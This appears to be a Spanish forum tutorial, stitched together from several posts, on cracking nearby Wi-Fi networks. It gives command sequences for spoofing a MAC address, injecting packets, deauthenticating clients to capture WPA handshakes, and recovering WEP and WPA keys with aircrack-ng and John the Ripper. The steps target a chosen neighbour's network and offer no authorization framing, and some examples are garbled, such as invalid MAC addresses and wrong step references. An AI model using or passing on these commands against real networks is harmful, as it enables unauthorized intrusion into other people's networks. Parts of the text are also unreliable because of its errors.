ogearse como super usuario ....

sudo su (nota: para ver las imagenes mas grandes debes darle click para que te lleve a la pagina, y despues dar otro click para q se aga grande) 1.- airmon-ng start wlan0 (aqui ponemos nuestra targeta inalambrica en modo monitor)

2.- airmon-ng start mon0 (creamos un clone del monitor para no tener q reiniciar nuestro ordenador al momento de terminar de hakear la red)

3.-ifconfig mon0 down (damos de baja el clone para cambiar la direccion mac) macchanger -m 00:11:22:33:44:55 mon0 (ponemos la direccion mac)

4.-ifconfig mon0 up (damos de alta el clone con la nueva direccion mac)

5.-airodump-ng mon0 (monitoreamos las redes inalambricas que tenemos cercanas)

6.- Identificar las redes inalmbricas disponibles as como las MAC y canales de las mismas: tomamos la que queremos hakear, en este caso la que voy a tomar para este ejemplo es la INFINITUM5974

Presionamos Ctrl+C 7.-airodump-ng -c (canal de la red CH) -w (nombre con el que queremos guardar el archivo) --bssid (direccion mac del modem seleccionado) mon0

Nos aparece la siguiente pantalla aqui vamos aver la conexion de nuestra pc

8.- abrimos una nueva terminal o pestaa aireplay-ng -1 0 -e (nombre de la red ejemplo infinitum5748) -a (direccion mac del modem) -h (nuestra direccion mac falsa 00:11:22:33:44:55) mon0 este paso lo hacemos para crear una asociacion entre nuestra pc y el modem

9.- una vez que la asociacion se a creado tecleamos aireplay-ng -3 -b (direccion mac del modem) -h (nuestra direccion mac falsa 00:11:22:33:44:55) mon0 este paso lo hacemos para inyectar paquetes

10.- Una vez capturados 150.000 paquetes en ARP se puede proceder al descifrado de la clave WEP utilizando una nueva solapa en la terminal: # aircrack-ng (nombre del archivo este lo pusimos en el paso numero 9 donde tiene -w en mi caso fue 5974-01.cap ) nos aparece la siguiente pantalla

Ya que ayamos encontrado la contrasea paramos todos los procesos que estemos haciendo. Como hacemos esto simple mente en todas las terminales presionamos Ctrl+c, de lo contrario no nos podremos conectar y tendremos problemas con nuestra targeta de red. 11.- ya que tenemos la contrasea nos podemos conectar, ponemos la contrasea pero le quitamos los dos puntos ejemplo: en mi caso la contrasea es 96:77:69:40:35 pero debemos introducirla 9677694035

# aircrack-ng (nombre del archivo .cap)*.cap -z Es ms rpido pero requiere ms paquetes capturados. # aircrack-ng (nombre del archivo .cap)*.cap -y Para utilizar fuerza bruta # aircrack-ng (combre del archivo .cap)*.cap -n 64 Para especificar la longitud de la clave WEP en bits: 64 para 40-bit WEP; 128 para 104-bit WEP, etc. El valor por defecto es 128 y en 2wire 64 bits. me despido de ustedes amigos espero q no tengan problemas, solo una recomendacion, en mi experiencia para hakear redes es recomendable utilizar una targeta atheros. Si tienes otra targeta de red busca en google alguna forma de parchar tu targeta en la pagina oficial de air crack hay muchas targetas ok...... sudo apt-get install macchanger sudo apt-get install aircrack-ng --------------------------------------------------------------------Cdigo: sudo airmon-ng stop wlan0 Cdigo: sudo ifconfig wlan0 down Cdigo: sudo macchanger --mac 00:11:22:33:44:55 wlan0 Cdigo: sudo airmon-ng start wlan0 Cdigo: sudo airodump-ng mon0 -----------CONTROL+C------------Cdigo: sudo airodump-ng -c 1 --bssid E0:91:53:0F:3F:D4 -w captura mon0 ESA VENTANA NO LA CIERRES SI NO SE JODERA TODO abre ote terminal

Cdigo: sudo aireplay-ng -1 0 -a E0:91:53:0F:3F:D4 -h 00:11:22:33:44:55 mon0 cuando te de salida para escribir pones este Cdigo: sudo aireplay-ng -3 -b E0:91:53:0F:3F:D4 -h 00:11:22:33:44:55 mon0 en otra terminal petas con Cdigo: sudo aircrack-ng -z *.cap

Yeli, puedes usar iwconfig <interface> channel <canal>

Paso 0! Antes que nada en cada terminal que usemos debes de estar logeado como superusuario solo debes teclear sudo su y despues tu contrasea (nota, cuando ingreses tu contrasea los caracteres no apareceran!! pero no t preocupes todo va bn). Paso 1! airmon-ng start wlan0 Paso 2! airmon-ng start mon0 Paso 3! ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 Paso 4! ifconfig mon0 up Paso 5! airodump-ng mon0 Paso 6! Identificar las redes inalmbricas disponibles as como las MAC y canales de las mismas: tomamos la que queremos hakear, ejemplo

ESSID: INFINITUM1111 BSSID= 23:S4:23:44:5F:T4 Chanel: 6 Station: Est en la segunda linea, hay una columna llamada Station (00:11:22:33:44:55) debe de indicar el mismo BSSID de la red que queremos atacar en mi ejemplo sera Station=23:S4:23:44:5F:T4 Presionamos Ctrl+C Paso 7! airodump-ng -c (canal de la red CH) -w (nombre con el que queremos guardar el archivo) --bssid (direccion mac del modem seleccionado) mon0 ejemplo airodump-ng -c 6 -w contrasea --bssid 23:S4:23:44:5F:T4 mon0 Y como vemos hasta aqui hemos procedido como en el caso de las claves wep!! Paso 8! ABRIMOS UNA NUEVA TERMINAL!! Aqui procederemos a des-auntenticar para obtener el handshake!! aireplay-ng --deauth 1 -a [BSSID] -c [Station] mon0 ejemplo aireplay-ng --deauth 1 -a 23:S4:23:44:5F:T4 -c 23:S4:23:44:5F:T4 mon0 Regresamos a la primera terminal y vermos en la esquina superior derecha algo asi WPA handshake: [00:11:22:33:44:55] En mi caso fue WPA handshake: [23:S4:23:44:5F:T4] Paso 9! Abrimos una nueva terminal o pestaa!! Buscamos por la red, descargamos un buen diccionario y corremos: aircrack-ng (nombre del archivo este lo pusimos en el paso numero 7).cap [Ruta diccionario] -w ejemplo aircrack-ng contrasea-01.cap -z [la ruta de donde hayas guardado tu diccionario...desktop/dic.txt] (ojo hay que agregar el -01.cap al nombre del archivo elegido en el paso 7!!) Y obtendremos la clave, dependiendo que tan larga y complicada est o que tan bueno est el diccionario. Esto es utilizando diccionario, pero tambien podemos utilizar la fuerza bruta hechando mano de John The Ripper. Para instalarlo escribimos: sudo apt-get install john Para hackear la red lo utilizamos como sigue: john -incremental=all --stdout | aircrack-ng -w - -e [ESSID nombre de la red] -a 2 (nombre del archivo este lo pusimos en el paso numero 7).cap ejemplo john -incremental=all --stdout | aircrack-ng -w - -e infinitum1111 -a 2 contrasea-01.cap Paso 10! Abrimos la ultima terminal!

aircrack-ng -z (nombre del archivo este lo pusimos en el paso numero 7).cap Y listo de cualquiera de las dos formas obtendras la contrasea!!! En mi particular punto de vista les recomiendo que utilizen diccionarios ya que John puede tardar desde unos minutos hasta semanas!! Si no cuentas con diccionarios aqui te dejo algunos links, te recomiendo los descargues todos y despues los unas, para que te sea mas facil y rapido hackear esa wpa tan tediosa